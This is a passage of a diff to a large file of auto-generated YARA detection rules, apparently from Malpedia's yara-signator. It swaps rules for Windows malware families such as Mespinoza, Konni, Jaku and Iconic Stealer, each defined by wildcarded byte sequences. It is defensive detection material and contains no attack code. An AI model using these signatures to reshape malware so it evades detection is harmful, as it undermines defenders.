@@ -129831,34 +130214,34 @@ rule MALPEDIA_Win_Mespinoza_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 7421 6a2c 6a00 56 e8???????? }
-		$sequence_1 = { 59 837d0800 89460c 7416 85c0 7412 }
-		$sequence_2 = { 50 e8???????? 83650c00 8bce 57 e8???????? 8b4510 }
-		$sequence_3 = { 5d c3 6a34 b8???????? e8???????? 8d45c0 33f6 }
-		$sequence_4 = { 8d8d6cffffff e8???????? 8d45b8 c645fc04 50 8b857cffffff 8d8d7cffffff }
-		$sequence_5 = { 6a07 6a00 68???????? ff75f8 ffd6 }
-		$sequence_6 = { c645fc01 e8???????? 83c418 8d4dd8 56 6a01 e8???????? }
-		$sequence_7 = { 8b5c2420 896c2410 eb08 33ed eb04 8b6c2410 c1e602 }
-		$sequence_8 = { 7404 c60700 47 c1e803 894518 8b01 ff5018 }
-		$sequence_9 = { 8bcf c645fc01 e8???????? 8b03 }
+		$sequence_0 = { 8bd5 498bcf e8???????? 8bf0 85f6 0f8493020000 498b8e20010000 }
+		$sequence_1 = { 448b64244c b801000000 4c895d88 4403e0 88442435 eb0a 448b64244c }
+		$sequence_2 = { 488bc8 e8???????? e9???????? 488b0d???????? 488b01 ff90f8000000 83f804 }
+		$sequence_3 = { e8???????? 8bc3 488b4d40 4833cc e8???????? 4c8d9c2450010000 498b5b38 }
+		$sequence_4 = { c744243800000000 e8???????? 4885c0 740f 488b4b10 488d542438 488b01 }
+		$sequence_5 = { c705????????03400080 c705????????f4060780 890d???????? c705????????09000380 33c0 3b7efc 7509 }
+		$sequence_6 = { 8b4708 894114 8b470c 894118 448bfb 49c1e705 4d03fe }
+		$sequence_7 = { 85c0 7508 41be02400080 ebd2 be01000000 33db 448be6 }
+		$sequence_8 = { b908000000 668908 83bb9800000000 0f850b010000 488b0d???????? 488b01 ff9020010000 }
+		$sequence_9 = { 85ed 0f89b1010000 0f1005???????? 4c8b05???????? 488d542460 41b902000000 b907010000 }
 
 	condition:
-		7 of them and filesize < 1091584
+		7 of them and filesize < 1591296
 }
-rule MALPEDIA_Win_Quiterat_Auto : FILE
+rule MALPEDIA_Win_Konni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77d947fb-1cf9-5915-bdff-e8a9015c7494"
+		id = "b496c86d-77c9-50ca-bd29-c6ba6090731f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quiterat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.konni_auto.yar#L1-L487"
 		license_url = "N/A"
-		logic_hash = "a310f4ac3c641f7313b25e7928a0fd6d50c428f9dd3945e05d910454f6c56057"
+		logic_hash = "4a537b4460e51cec9389cef999baf5dfc7c64c03085bd38519060ea921833d74"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129870,32 +130253,75 @@ rule MALPEDIA_Win_Quiterat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff31 8bcb ff5018 e9???????? 8b03 8bcb 8b4014 }
-		$sequence_1 = { eb31 80bef800000000 7426 8b4c2418 e8???????? 8b4c2418 6830750000 }
-		$sequence_2 = { b803000000 8d4e60 89442410 8d442434 50 8d442420 50 }
-		$sequence_3 = { f00fc11e 4b 0f95c0 84c0 0f858a030000 6a04 6a02 }
-		$sequence_4 = { c644241c01 eb05 c644241c00 f6c308 740c 8d4c2414 83e3f7 }
-		$sequence_5 = { f7f6 2b4c2418 3bc8 0f87e0000000 0fafce 03f9 33f6 }
-		$sequence_6 = { e8???????? 8d4c2410 e8???????? 8b442440 8b4c2430 64890d00000000 59 }
-		$sequence_7 = { c7460400000000 85ed 7e1c 90 8b4604 8b4e08 03c0 }
-		$sequence_8 = { e9???????? 8b06 83780400 7558 8d442434 50 e8???????? }
-		$sequence_9 = { 8b06 85c0 7415 83f8ff 7435 8bc7 f00fc106 }
+		$sequence_0 = { 0fb609 0fb6d2 03ca 81e1ff000080 }
+		$sequence_1 = { 83f801 7508 66c745f50000 eb09 83f802 7504 }
+		$sequence_2 = { 0fbef1 83e601 8970f0 d0f9 0fbef1 }
+		$sequence_3 = { c745e0f4010000 890d???????? 8815???????? ff15???????? 85c0 7552 }
+		$sequence_4 = { 83c410 85c0 0f850fffffff 6a3d 68???????? 53 }
+		$sequence_5 = { 8970fc d0f9 0fbef1 83e601 8970f8 }
+		$sequence_6 = { 81e6ff000080 7908 4e 81ce00ffffff 46 8a9c35f8feffff }
+		$sequence_7 = { 49 81c900ffffff 41 8a940df8feffff 8d8c0df8feffff 0fb6da 03f3 }
+		$sequence_8 = { 83f804 740f c705????????02000000 83f801 750a c705????????01000000 890d???????? }
+		$sequence_9 = { 6a01 ff15???????? 50 a3???????? }
+		$sequence_10 = { 33c9 83f802 7508 890d???????? eb1e 83f804 }
+		$sequence_11 = { 68b6030000 6a0d 50 ff15???????? }
+		$sequence_12 = { 8d4801 eb02 33c9 e8???????? 8bf8 }
+		$sequence_13 = { 8d85eafbffff 33d2 57 50 668995e8fbffff e8???????? 6a40 }
+		$sequence_14 = { 51 e8???????? 83c408 be???????? 85c0 7513 }
+		$sequence_15 = { 8bd9 33ff 8d8df2fdffff 33c0 57 51 668985f0fdffff }
+		$sequence_16 = { 745d 8d95f0fdffff 52 6804010000 ff15???????? }
+		$sequence_17 = { 8b35???????? ffd6 8b85d0fbffff 50 ffd6 57 ffd6 }
+		$sequence_18 = { 0f1f840000000000 0fb601 4883c104 48ffca 0fb60418 8841fc 75ed }
+		$sequence_19 = { 81eb00200200 83bd9404000000 899d94040000 0f85d7030000 8d85a0040000 }
+		$sequence_20 = { 8916 56 e8???????? 8a8c30dec44600 }
+		$sequence_21 = { 41b850000000 4533c9 488bd3 488bc8 c744242803000000 }
+		$sequence_22 = { 8d85f0fcffff 50 68???????? ff15???????? 85c0 741c 6a00 }
+		$sequence_23 = { 52 6a00 6a00 ff15???????? 68d0070000 ff15???????? }
+		$sequence_24 = { 488bcd c744242880000000 4c89642450 4889442458 4889442460 c744242003000000 ff15???????? }
+		$sequence_25 = { 4c89742420 ff15???????? 488bd8 4885c0 744f }
+		$sequence_26 = { 33d2 56 e8???????? 8a9435dec44600 5e 84c0 8bfa }
+		$sequence_27 = { 6804010000 8d95f8feffff 52 50 ff15???????? 8d85f8feffff 50 }
+		$sequence_28 = { 49ffc0 49ffc9 75d5 0fb645bd }
+		$sequence_29 = { 4c895df7 4c895dff 4c895d07 c745bb67e6096a 8d7808 488945af }
+		$sequence_30 = { ffd6 68???????? 8d8df8feffff 51 ffd6 }
+		$sequence_31 = { e8???????? 8a8c30dec44600 5e bb01000000 }
+		$sequence_32 = { 83e203 83f908 7229 f3a5 ff2495f0444000 8bc7 ba03000000 }
+		$sequence_33 = { 4c8b5da8 4533c9 420fb6440db8 49ffc2 }
+		$sequence_34 = { 8d95f8feffff 52 ffd6 6804010000 }
+		$sequence_35 = { 00644440 0023 d18a0688078a 46 }
+		$sequence_36 = { 33db 56 e8???????? 8a9c30c2c44600 5e }
+		$sequence_37 = { 59 0bc9 89851a040000 61 7508 }
+		$sequence_38 = { 5d bbedffffff 03dd 81eb00200200 83bd9404000000 }
+		$sequence_39 = { 33c9 56 e8???????? 8a8c30a6c44600 5e }
+		$sequence_40 = { ff15???????? 8d95f8feffff 52 ff15???????? 8b3d???????? be0a000000 }
+		$sequence_41 = { c3 8b442404 c7405030880010 c7401401000000 c3 }
+		$sequence_42 = { 59 3bc7 59 a3???????? 741e 68???????? 68???????? }
+		$sequence_43 = { 42888401d0fa0100 ffc7 ebde 488b05???????? f0ff08 }
+		$sequence_44 = { f2ae 488d442440 33d2 48f7d1 894c2428 }
+		$sequence_45 = { 56 e8???????? 80a0c798001000 80b8????????5c 59 }
+		$sequence_46 = { 4c8d05c7650100 488d15d8060100 488d4c2420 e8???????? }
+		$sequence_47 = { 8a4c303a 413ac8 741d 85db 7419 880a 4b8b84f9a02e0200 }
+		$sequence_48 = { 83e00f eb02 33c0 0fbe84c608710010 }
+		$sequence_49 = { 742e 85f6 7419 0fb6da f683a1a2001004 7406 8816 }
+		$sequence_50 = { 0f85a3010000 8b7510 53 817e0402010000 0f850f010000 66833d????????01 }
+		$sequence_51 = { 80794000 0f857e010000 48897c2450 4183f901 753b 48895108 }
+		$sequence_52 = { 41f7d1 488d3d99550100 4983f808 0f82ec000000 48895c2410 498bd8 }
 
 	condition:
-		7 of them and filesize < 5892096
+		7 of them and filesize < 2361344
 }
-rule MALPEDIA_Win_Ployx_Auto : FILE
+rule MALPEDIA_Win_Miancha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88ff8b0e-42c8-531a-aa7c-e4d988bc3583"
+		id = "0fca04e0-92f2-5b94-88d0-1960dbccd943"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ployx_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miancha_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "6c51c47290988f53993f59d945fc1bce237ebb223534fe936a15d347d9e6950c"
+		logic_hash = "265db074bcd13da1887f66f32f80a00bfe9fccbd1f685bc2e9a0d53a7fe9cd80"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129909,34 +130335,34 @@ rule MALPEDIA_Win_Ployx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d 5b c3 56 68???????? 6804010000 ff15???????? }
-		$sequence_1 = { e8???????? 8b35???????? 59 59 8d45fc 50 ffd6 }
-		$sequence_2 = { ff7610 e8???????? 8bf8 8d4701 50 e8???????? 56 }
-		$sequence_3 = { e8???????? 8b0d???????? 56 ff75f0 c1e105 50 89840da8d5ffff }
-		$sequence_4 = { 56 57 6a03 8b5d08 99 5e 33c9 }
-		$sequence_5 = { 720a c1e818 0500040000 eb0a c1e810 25003f0000 0bc7 }
-		$sequence_6 = { e8???????? a1???????? c1e005 8b8405a8d5ffff 80243000 a1???????? }
-		$sequence_7 = { ff15???????? 6aff ff35???????? ff15???????? a1???????? 3bc6 5e }
-		$sequence_8 = { 8b35???????? 83c434 8d85a4fdffff 50 ffd6 8d45dc }
-		$sequence_9 = { 5b c3 56 68???????? 6804010000 ff15???????? 33f6 }
+		$sequence_0 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c }
+		$sequence_1 = { 6a02 6a00 68???????? 52 ffd6 }
+		$sequence_2 = { 52 ff15???????? 50 ffd6 85c0 741a 837c241800 }
+		$sequence_3 = { 50 8d4e01 51 68???????? e8???????? }
+		$sequence_4 = { 56 8b35???????? 6a02 6a00 68???????? }
+		$sequence_5 = { 68???????? 68???????? c744242000000000 ff15???????? 50 ff15???????? 8bf0 }
+		$sequence_6 = { 6a01 6a00 68???????? 51 ffd6 85c0 }
+		$sequence_7 = { 68???????? 68???????? c744242000000000 ff15???????? 50 ff15???????? }
+		$sequence_8 = { 85f6 7412 8d542418 52 }
+		$sequence_9 = { 7412 8d542418 52 ff15???????? 50 ffd6 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Flusihoc_Auto : FILE
+rule MALPEDIA_Win_Jaku_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d409317-c933-58d0-aa63-14cb54e47b7c"
+		id = "0112e8e2-bdef-5365-8ac6-db0d7a5331a7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flusihoc_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jaku_auto.yar#L1-L267"
 		license_url = "N/A"
-		logic_hash = "410a07cce1b358109f5858d6a241fb0d56be6d17f2ab80d7283dacba4edb86ad"
+		logic_hash = "48ece9688342db3652fd3070c7f85ee33a0b73ea4b91e59fc03cc271dad9fdd8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129948,38 +130374,51 @@ rule MALPEDIA_Win_Flusihoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 33c4 89842450160000 53 56 8b7508 57 }
-		$sequence_1 = { f3a5 c684246402000000 e8???????? 68d6000000 }
-		$sequence_2 = { 8d4de8 3c7c 740f 3c0a }
-		$sequence_3 = { 52 ffd6 6a0a ff15???????? }
-		$sequence_4 = { 8bec 83e4f8 b854160000 e8???????? a1???????? 33c4 }
-		$sequence_5 = { 8d7c2428 50 f3a5 c684246402000000 }
-		$sequence_6 = { 6a00 50 c744242c44000000 e8???????? }
-		$sequence_7 = { ffd3 8b442410 6aff 50 ff15???????? 8b4c2410 51 }
-		$sequence_8 = { 83f822 7506 fe8e42010000 3d14010000 7506 fe8633010000 }
-		$sequence_9 = { 57 6a40 8d442428 6a00 }
-		$sequence_10 = { f3a5 c684246401000000 e8???????? 83c40c }
-		$sequence_11 = { 83f828 7507 80864d01000004 83f822 7506 }
-		$sequence_12 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 }
-		$sequence_13 = { 8d8df8feffff 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 }
-		$sequence_14 = { 6806000200 6a00 68???????? 6802000080 ff15???????? 85c0 752f }
-		$sequence_15 = { 85c0 752f 8b8df4feffff 6804010000 8d85f8feffff 50 }
+		$sequence_0 = { ff75f0 ff75fc ff7618 e8???????? 83c40c }
+		$sequence_1 = { 83ff10 7321 837df800 0f84610e0000 8b45fc ff4df8 }
+		$sequence_2 = { 5e c3 833d????????00 56 8b742408 7505 e8???????? }
+		$sequence_3 = { 66891441 ff4e78 75b6 ff466c 8b466c 3beb }
+		$sequence_4 = { d3e2 8b4de4 85d1 7404 d1ea ebf8 }
+		$sequence_5 = { 894dcc 750c 81fa54030000 0f8316020000 83ff02 }
+		$sequence_6 = { 83c418 33db 894618 895df4 c70601000000 e9???????? }
+		$sequence_7 = { 5b 8bd3 3bc3 8955ec }
+		$sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c }
+		$sequence_9 = { ff742408 e8???????? c20800 8bc1 }
+		$sequence_10 = { 5b c3 55 8bec 833d????????00 53 56 }
+		$sequence_11 = { 6a01 03c3 68???????? 50 e8???????? 83c40c }
+		$sequence_12 = { 53 68000000a0 6a03 53 }
+		$sequence_13 = { 7507 b800308000 eb02 33c0 }
+		$sequence_14 = { 55 56 57 6880020000 }
+		$sequence_15 = { 7508 83c8ff e9???????? 8b839f830000 }
+		$sequence_16 = { 75dd 57 e8???????? 59 }
+		$sequence_17 = { 85ff 741b 3bd0 7f74 7508 8b442418 }
+		$sequence_18 = { e8???????? 59 eb57 53 }
+		$sequence_19 = { 0245fd 3245fe 8a4dff d2c8 }
+		$sequence_20 = { 56 e8???????? 59 8b4620 }
+		$sequence_21 = { 50 e8???????? 59 8b4e2c }
+		$sequence_22 = { 016c242c 8b44242c 5f 5e 5d }
+		$sequence_23 = { 2b4d08 3bf1 770a 68???????? e8???????? 034d14 2b4508 }
+		$sequence_24 = { 66d3e2 02c3 888677830000 66099675830000 }
+		$sequence_25 = { 85c0 743a 6a58 e8???????? 59 }
+		$sequence_26 = { 51 6800040000 ff750c 50 ff15???????? 85c0 7527 }
+		$sequence_27 = { 6a00 66c745903c00 50 e8???????? }
+		$sequence_28 = { 6a00 57 e8???????? 8945fc }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 2220032
 }
-rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
+rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45c172b9-1490-520d-9674-c2fea272cf58"
+		id = "380edff9-b58c-56a7-886b-9f1f08a2730a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gh0sttimes_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iconic_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "b365988442ea76655e7c2dc8b1db33d5df97fce16bdb0e3992e0bc9191760298"
+		logic_hash = "79bfb58f74bc25ff74aa194b90c6f55ae1a1814931feba358207424fda4b9135"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129993,38 +130432,32 @@ rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c68598fcffff05 889d99fcffff ff15???????? 68???????? 8d841d9bfcffff 50 }
-		$sequence_1 = { c685b4feffff6d e8???????? eb05 e8???????? }
-		$sequence_2 = { ffd3 8b3f 85ff 0f844f020000 }
-		$sequence_3 = { e8???????? 83f8ff 7510 57 ff15???????? }
-		$sequence_4 = { 6a01 8d4d08 8bd6 c645086b e8???????? e9???????? 33ff }
-		$sequence_5 = { e8???????? 8bfc 57 56 }
-		$sequence_6 = { ffd3 e9???????? 8b8d8cfeffff 8b8588feffff 894e24 6a01 }
-		$sequence_7 = { c7858cfcffff03000000 c78590fcffff00000000 c68594fcffff05 889d95fcffff c68596fcffff00 889d97fcffff }
-		$sequence_8 = { 488b4c2438 488d442430 488d15da700200 4889442428 }
-		$sequence_9 = { 488b8f40010000 ff15???????? 488b8f40010000 ff15???????? 48c78740010000ffffffff 488b8c2490000000 4833cc }
-		$sequence_10 = { 488b4c2430 488b4968 e8???????? 4c8b5c2430 }
-		$sequence_11 = { 488b4c2438 488d442434 4c8d4c2430 4889442428 488d442440 488d1520790200 }
-		$sequence_12 = { 488b4c2430 488b4968 33c0 66890451 488b442430 }
-		$sequence_13 = { 488b4c2430 48c1e80c f7d0 334108 }
-		$sequence_14 = { 488b4c2438 488d442430 488d150c710200 4889442428 }
-		$sequence_15 = { 488b4c2430 83490c08 a808 7409 488b442430 83480c04 }
+		$sequence_0 = { e8???????? 85c0 0f840c020000 4084f6 0f847e030000 45386c2467 0f8573030000 }
+		$sequence_1 = { f20f590d???????? f20f580d???????? f20f580d???????? 897728 33f6 f2480f2cc1 488907 }
+		$sequence_2 = { ffca 490faf92c8000000 4c8b09 41ff9190000000 eb08 498bcb e8???????? }
+		$sequence_3 = { e8???????? 89442448 eb2e 488d0c52 8d4201 898390000000 488b8388000000 }
+		$sequence_4 = { e8???????? 498b0c24 488d542430 41b101 41c744242401000000 49c7c0ffffffff 48c7442420ffffffff }
+		$sequence_5 = { 7416 41b101 4c897c2420 448bc5 418bd4 488bcf e8???????? }
+		$sequence_6 = { f6c224 7405 488b31 eb2b f6c208 740e f20f1001 }
+		$sequence_7 = { ffc3 4903ee 413bdf 0f8e5dffffff 488b5c2448 4885db 0f8495000000 }
+		$sequence_8 = { eb1e 486306 8d4801 394e04 0f8d94000000 488b4d00 4d8bc6 }
+		$sequence_9 = { 7d0f 488b4208 488d0c49 0fb654c80c eb02 b244 0fbeda }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 2401280
 }
-rule MALPEDIA_Win_Albaniiutas_Auto : FILE
+rule MALPEDIA_Win_Plaintee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ed214e5c-6897-5f8e-bd2b-0bb8f51690d9"
+		id = "d95cbeb4-c06c-51b3-a2cb-8f8e5a1bfe81"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.albaniiutas_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plaintee_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "4a292a9bd7e73dd3f8f38b0c5f35ad3036161e113ab281f4d09533b41c3cbb43"
+		logic_hash = "0e73f73019071a1fc77ee2e72d1d76e92ad8df711ace3b0abcab294f32362d30"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130038,32 +130471,32 @@ rule MALPEDIA_Win_Albaniiutas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 743a 8d45f4 50 6a01 ff75fc 6810660000 }
-		$sequence_1 = { ff75fc 6810660000 ff75f8 ff15???????? }
-		$sequence_2 = { 40 c745ec48770010 894df8 8945fc 64a100000000 8945e8 8d45e8 }
-		$sequence_3 = { 83e03f c1f906 6bc030 03048d90df0210 50 }
-		$sequence_4 = { 83e63f c1ff06 6bf630 8b04bd90df0210 f644302880 741f e8???????? }
-		$sequence_5 = { 83c418 8945d4 85c0 740f 8b4508 c74018241c0110 }
-		$sequence_6 = { 8d5b01 33c8 c1e808 81e1ff000000 33048dc01c0110 4f 75e5 }
-		$sequence_7 = { 83e805 7456 83e801 0f859b010000 c745e0e87c0110 8b4508 8bcf }
-		$sequence_8 = { 3998c8a10110 0f84ea000000 41 83c030 894de4 }
-		$sequence_9 = { 331c85c0280110 335e08 8bcb 8bc3 }
+		$sequence_0 = { 52 56 50 ff15???????? 83f85a 721a }
+		$sequence_1 = { 898638010000 750a b001 5e 81c490010000 c3 8bce }
+		$sequence_2 = { 740a b001 5e 81c490010000 c3 6a11 }
+		$sequence_3 = { 56 e8???????? 85c0 754c 68ac010000 e8???????? }
+		$sequence_4 = { ff15???????? 83f85a 721a 8a16 }
+		$sequence_5 = { 8b4c240c b801000000 80c20a 3bf0 8811 7e0f 53 }
+		$sequence_6 = { 6a02 ff15???????? 83f8ff 898638010000 750a }
+		$sequence_7 = { 7e0f 53 8a1c31 32da 881c31 }
+		$sequence_8 = { 8a1c31 32da 881c31 41 3bc8 7cf3 }
+		$sequence_9 = { 66ab aa b916000000 33c0 }
 
 	condition:
-		7 of them and filesize < 566272
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Moonwalk_Auto : FILE
+rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fd39fa26-9d1a-515b-b730-f6f9e30e5941"
+		id = "cb0c66df-41c4-52ac-ac22-d6d2f5a2308d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonwalk_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.puzzlemaker_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "1c19a679d272620c40c7a55b8a8c2eabaee5ff1d6dffe1b79863d345d92546d6"
+		logic_hash = "59c32899b883bfb9bd7e74e09947139de6a13e19aa30e115675dc0025c3e011c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130077,32 +130510,32 @@ rule MALPEDIA_Win_Moonwalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660f1f840000000000 488b03 483301 0f85ce000000 4883c308 4883c108 493bdf }
-		$sequence_1 = { c3 4038ac24a0000000 0f854dffffff 488b4330 8b4804 398c24a4000000 }
-		$sequence_2 = { 0fb6d1 418bca c1e908 458bc2 49c1e818 428b9c8030260100 339c90303a0100 }
-		$sequence_3 = { 7541 488d8538010000 89bd38010000 33d2 4889442420 488b05???????? }
-		$sequence_4 = { 488b4008 488905???????? 488d4db0 48894548 e8???????? 85c0 0f8898010000 }
-		$sequence_5 = { 304304 488b442448 0fb60408 304305 488b442450 0fb60408 304306 }
-		$sequence_6 = { 0fb60408 30430f 488b45a0 0fb60408 304310 488b45a8 0fb60408 }
-		$sequence_7 = { 488b4858 488d4580 48894578 48894d50 4c896d70 48899d80000000 }
-		$sequence_8 = { 0fb603 48ffc3 4403c0 493bd9 0f835a020000 3dff000000 74e7 }
-		$sequence_9 = { c3 48895c2408 4889742410 57 4881ec90000000 488b4210 488bd9 }
+		$sequence_0 = { 0f830c020000 4c8b7da8 4c8d0529b5ffff 8b4590 }
+		$sequence_1 = { 4c8d0500aaffff 48895108 0fb60a 83e10f 4a0fbe8401b8640100 }
+		$sequence_2 = { 8bd9 488d15d6060100 33c9 ff15???????? 85c0 }
+		$sequence_3 = { 488b8d00020000 ff15???????? 4585f6 740a 4183ff0f 0f8284fdffff }
+		$sequence_4 = { 498bd8 4c8bd2 0f84ac000000 4c634910 4c8d35c2bbffff 488b7a08 33f6 }
+		$sequence_5 = { 4883f8ff 74c8 488bd3 4c8d0502f20000 }
+		$sequence_6 = { 4883ec58 488b05???????? 4833c4 4889442440 e8???????? 488d05a1fdffff }
+		$sequence_7 = { 77ae 2bd1 83fa0f 777a 8b8c96101a0100 4803ce }
+		$sequence_8 = { 488b11 ff5210 ff15???????? b801000000 488b4d1f }
+		$sequence_9 = { 4181f804010000 72e1 448bc0 4c8d0d1f0e0200 }
 
 	condition:
-		7 of them and filesize < 179200
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Hawkball_Auto : FILE
+rule MALPEDIA_Win_Zupdax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f75e692-110c-55bd-97fc-1bd1a739617b"
+		id = "d7482dbc-f70b-5a30-84dd-76b8876bc623"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hawkball_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zupdax_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "ff667bedec18f0ed00ed5af46ab0b00bb4fbcb93b0094e0e12e6710929fc2634"
+		logic_hash = "c678dda4eb233d445c52eec76463d1638934195de484c67d217556190a9036d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130116,32 +130549,32 @@ rule MALPEDIA_Win_Hawkball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d5f08 c745f000000000 8d470c c745ec0c000000 53 }
-		$sequence_1 = { 51 53 8b1d???????? 8bd3 8bcb c1ea08 c1e910 }
-		$sequence_2 = { e8???????? 83c40c 8d85fcfeffff 6a01 }
-		$sequence_3 = { 81ec7c050000 53 56 8b7508 57 8b3e 85ff }
-		$sequence_4 = { 53 660f6f05???????? 56 f30f7f4588 }
-		$sequence_5 = { 6a01 894705 ff15???????? 50 }
-		$sequence_6 = { 50 e8???????? 83c40c 8d842478020000 6a00 6a00 }
-		$sequence_7 = { 83c40c 8d842478020000 6a00 6a00 6804010000 50 8d442464 }
-		$sequence_8 = { 8b5dfc eb35 837e4400 7462 6a00 }
-		$sequence_9 = { 6a08 ffd3 50 ff15???????? 8bf0 8d8578ffffff 50 }
+		$sequence_0 = { 55 8b6c2408 56 57 33c9 33f6 33ff }
+		$sequence_1 = { 895e28 895e2c e8???????? 8b460c 83c404 3bc3 }
+		$sequence_2 = { 894714 8b4618 895618 894718 33db 83c61c }
+		$sequence_3 = { 895e28 895e2c e8???????? 8b460c }
+		$sequence_4 = { 895e10 895e14 e8???????? 83c404 5f 5b }
+		$sequence_5 = { 81e6ff000080 7908 4e 81ce00ffffff 46 8a1c06 881c01 }
+		$sequence_6 = { 33c9 33f6 33ff 394c2414 765b }
